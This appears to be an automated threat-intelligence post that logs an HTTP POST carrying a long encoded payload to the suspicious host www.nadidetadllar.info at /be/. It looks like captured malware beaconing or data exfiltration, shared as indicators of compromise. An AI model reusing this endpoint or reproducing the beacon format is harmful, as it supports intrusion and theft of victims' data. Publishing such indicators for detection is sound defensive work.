uTCpH=7afIdyNRIQZ_kgRMLweRPZCMTgO24MuRMCx9J7nyI-jFSiZ5jokhBD6_~yioUX3mX12E68ZEBaBWLvb_qbrqyGvR5T1GGwxzuW3Cdql7EIAd3ZAMJZem13Hecp4_TJLf1h2Yl3U63Ktdwwyt17r9Bne040JlbEn4BZU2tLNOjp06T77Aef9NzTVQdB5O~lhG~XL4f2L0dlHttNsfVHuI8S2JhgKbiIZhDN8jhf9mStuW98CIpRM2TlcehGRMBkgptA84ioGNz-L7h3KG6x3FvqExlNOQYFgP1X9CEbibyVJbOO1CVq5ZuBNLDnrUT8qodaXzhfPtMxEJ31jvIoFAvPQKFo(kufzSvYvR2olDInLB9BHdJ4V9blWEiAzbRT1nfIa9nHKuIN3ydLPNGU8wDHow7dwbSjQ5d2GpIHAjn3o0~H7RU9GgT0mKy_O1RylfmkN1LB4HazEWIDq5YO~rXli8XiHV7kjBDzNIbsyo62fLqbRXi9en4B26FRgZsFOdXfTYV0FrI8JaBLbnsFb8UEUMSVoOIPiWmRunP1fey91a2CLet9eXfjulFisdswIZCMeAuwAhCvtCQ1A04UTZKLlurhfqXMm-vhi1rHqcA8aTPGmQD3tOaGWsOY~7JTHSxkNCfN(t27~XDkwdJgxCi64vs83uWg~3V4RyPBcY1it0GUUa9EgrE4aF1DxI8Au67LvewX7fCgwZblhDegXvHEx-Ry0euwQkVQfj0FEIy-GhuXKeyelHM0ltE6Yb8Qx_bzF_zXrqRjlnbGu23EypAsTWnzMWMFsa0w5sDvgm0NdoCnJmWyCbFDIVQjOLB1mUXYabHBkEPJa7jQSxn1ppjzKw2Qcf57VBlGxi3Nx6rIEG1jf6eQc919Ls~EawAqMz5NbppK1eeff1B2gsO7tetkx2UtrJ1Z(j9J~hH1vmfYUEogVqPPiuSR5-p0EudUpv~rRRmqwzW8PWLKO7bRxjg0QQchw6ATkVqA4N93dTslG5cblNn_ewhCQMuHxFwAbZ7QGTbxiLDFIW~_DayiqwEZXc8LkYFWsfUKBLSKVz4jYjbRPpHXDnrVLnX6Mb9GANGaoFALbPhH6Q6gwFY3bNdTFYwUFz3m23uvsvv9QN0mcR8eP8qNwKarBch4U1~ebpMPE7aYHZFfAI1-N0Wb(BRgklyx0VLv7bPLqo3B7lTeirOndZSJCzGnLwuVFE4t9RiwoQSHU2(ilAeyrBgIPSox1HxCqZsUZ_DE8xYQ02YjLiP8geeoqq1mkBwnYV9Dn92RE3JzNtSuIJf-rxjWz3yIymXzuiZdY8aE5WAhxSLfr8xWhOUk4-oDU4MaXkJmi1FGfoTMOTF-uf2-lwJLCWC_lbvXoNZ_PL8W8SfXtgr-(xfyRhVl0mJZ6EuwZrU53N4xjPLOhttG5hmx3lERYIn_JRhRr93tZat-UbKRnYA0LDp4HwELNgVrDVKcOkXOSyiJaYC0nThVi8zezuAZgDjBkfcW9j4ogk5bZy5qom5JhS4hIoSd8SlxE5RFWRkHLERY0o3xF04RiKN_~qi_a9XiA7SbHaxek3KsYvtTzCl_yBjsYcymZwrmEAQbi_tcOCrPt-F3lobbamk-zYKGNxkjmaN8yamS~jAuXDb3EyVQbXLYzzqHOiEBtOfb7HWRfbguDp28MwqwV211hwmCOkFiMD30MMZWO7W1~pjG0KqPoey5Czo_iEfPvUyQDwEDkHBLKq9W(7QlNt4UGGB2oahkEKg0(eryP6jLBNjqcvVDVWvapLD0AiFloqOoOuIiraw3tqHE(Rl2CNV-5quJSn7GXAh4252L3xcYagQX3lNm998MHg(utUgieqGRygZx~ODKdbTZIpcaCPZoPm4IDVbIWLkcHTsvkuHu5GgfAfhN3VuhUOfLsHZiJeQbdmJsaXRFPIn3~WDMg4be20VsQiDGcea9ECwGgbztj5BY4WRTAfH4mHwdq4o4c6N8gVXl0HcDqEnRxfvgrjkSRhzZOA4O7Pwj0ezab6laMkcpRnAk6WGZ5_7ZRfoqTno6cnEanDdfxsKA4-wB8-O5~7xYqElybRrZQIPvWJHbng5RD3bju-seXlNvR7Fjtc7Yhaq0exmUMxURrJLjde(Xgzfy7oY69mGQXPictIokwp90roGebD(Hk2OCIYbHUp0jS0bX4vXn9xK2jVYVbl\x004VvaR5-

http://www.nadidetadllar.info/be/
  • Hostname: www.nadidetadllar.info
  • IP Address: 162.213.255.158
  • Port: 80
  • Count: 1

POST /be/ HTTP/1.1
Host: www.nadidetadllar.info
Connection: close
Content-Length: 57159
Cache-Control: no-cache
Origin: http://www.nadidetadllar.info
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.nadidetadllar.info/be/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

uTCpH=7afIdzEoFAVugiJdBRuBFdG1Zwa47fOAB1FfJ7X-Cr(XZiJ5rOwmFj6gvCirQSv0Y32y69t-BaJVS7f2o939wWyk1zhlC0Zwv1KdWJ17JYkb9rpKa72h53bYXJgqJueq0D6UsSgWm4tK71fy0YK8O3bG3ThjeTXsGYUUzakEgt0wWpzXeaFe0TFtSio62zExpkn4cHDdJWPvhtMXSQCDtR~kmiScnY5iC4Ro7KMaB_eazOb3txA9eUszkFxdC0EwqGswm4a2gdn341Cu5Sbdue5c(8GQBkAzyRoPA7j90UtfHu16VqsauzQwfXrSNOe7NL(Vr6r9DgUJ3W78ca9PzfRUG-e-qsWevY(73c9DJhbB5h3cP4V9SFWGiAyWRT1OfK6xmHSuOPvwSdDHWmhLBno0~fU7Ej8Bd1GxJnsjgEk3sVTVcOevLkTPnOafRypSnlcmczc0bzEZHQP_cKKNaRrmVi(m00GaDTZHbLe071aSm71Huomj7wGnS3VEiUTjX_Wle1Z6O74XB4zbhBLoVEp2Zy4Yd86ptAmaOlCd6f9o7D2ErPqxZC37BX8fpR4cD7KHmg4uPPhnGXki43uKNZdKsBThYtftljiF9V6hXNGPJzyINHB9QFuaEbaPBW3X5hwHRPHGxcqmJXxqUxF-tdNavMrQbE~oWdgaLiYhjyIMSR4C6VcHO_uZxRJq4lyO5q2soA3SOT8sSE0yHAjUQmgecCFSuHsdVQXnz1AIz-yh5AqZj_kOV0koaKY5zxMsbx1jyXvqUQ9lJV2CzT6ONMTOh3cTIEMN0zU7Av1TwOtvQ3piXyDRGjkuSjC4F02yXoPGVzAUGqyrlDqws3Vqnzqe3wBYjZhcuk1gqNBM(dgK7gTqcRElqqWq3lC7Rohz89rDi6AjGOPEJkoOPakxy09dRqWL0LHT3afPdUPIVKQWxyRAePWmWAh5qGUyd1Vj35UPqLUpD97FZ-WufSMPsAQ7fBkMfBEMkTwX(Et2uyKYf-oErauLslZttihz4BDX3H2_PXiGBSAz8ubm9wHdVaHsvrg5ESlKadMXJcQZ9wUSSzioMi7fuyvVXsVLpUwdZdccMZLCjmTo7wITfS6YKD9lzEdWlRa9uqJc2fsNg2UR~IP8nscdefROhP8Ri9H0cZUlc6eHWd5Ix_x9dfX5BCREjTYmSYCNI6SG~W3oTYWrLwdmE4vjBjayoxJi5-lKoi8EJHBknDVVPCDUurTt~zl1iHbHjkJMLDk7dTc5YXGVD8ILftGd~2gT92gluyDspiMfaHEvKPFSUp7Nnj7v4Ja6cwy3WfUOLkhRd38uPPTP51UiW1oWgBBYNOq1D0vkPVrfF9WRMrHk4_RCdbL_N8R6mF9mB4zh0nIDf19xssbpZFZIZXlcI7bU8w5kTOvi8AW7YMgP0Wd15xzmDxwnvvVZt07l~pVb~eZOPBrNMDPpstPDBZtCWrDmBIjndLGyiJScFUjGgkuMzPyaXrBV0RMeZVE-(p8-x7Nl8Pg41KhGxgIvOdlljzNyVGDy1mPLBL0C1ClH2BCib8qqhMCcZHlSU6fG8OVkMvoj4nDal5iGkPJbomd7nmQdSaCRnYz2uP17BG9-QoK-rsLYDTl1qCq0TvHVnT~_Jo(UeEoUSkzDOLHG~WuALQZMMKTXSynS3-PNzcAS~Ah6zmJBrCz_dxFU1EMKb3r0QF67jDB-m8QZy460kNyff4Hg6xTeC1w1LJ6GxSK8IARm2GO_IWYfv2ou2h(grQmvgokj3dcEUyEJ49MYPmo3E3wRA8SzOQLG4k55DFehjxqFc55nvPWWwmL9hpek3p6GfYiIeUvLGAhkr-2H~rVVuSCoOUfGBwSBMYdTWZ5hQPqPbNTruYeaNYvIt8ahxtMCDflwxvQkhs3qmyETfL0nWyJWR5tyDJPyenrs9jWsWP1sccC6LMYiKAUCL8s_7lMg~NLfIYgbQw8eB6WBpfeqtoYvMMY4Qh84TgGHiS9Vt3CotStJwZzAjbP3zHdJzYLpmZ4dR5tocFCFEuQ-7IM5pJvp~9ZSKoDRX_UOYg9WzEExBYOZgouHzgaTrus6e8etG-e7wzjwMQ6dweKPDPJ7NhxFyodPxy65x3oSVBPyGiRb~S4XXim6dKh9aDm-kfp69F9_9XDvNdSc5mkKeQZEGRJWzW(WaR05UVp0YnzSRS2Pt8tqxh4-KnSJji7wYWsdlTpedFJAbmcxZdar7ePOIK8eZBQJAzZEzoNzouB0ivQGQr3RYZEjxEp_KqNK0FY9ZKh_6vGRjb6Gm6M1004swy59fHvFxYm9j7lzEbbPJz7VXOcEv5o9s2unHaNn9WFygygyDvW_lQDsNdthYuRP76~uORBu~2bQYRi-x1~dqGquZKPFm3Dja4~UOdDGo

#infosec #automation

TheSystem Itself @ 2018-05-03 16:15:05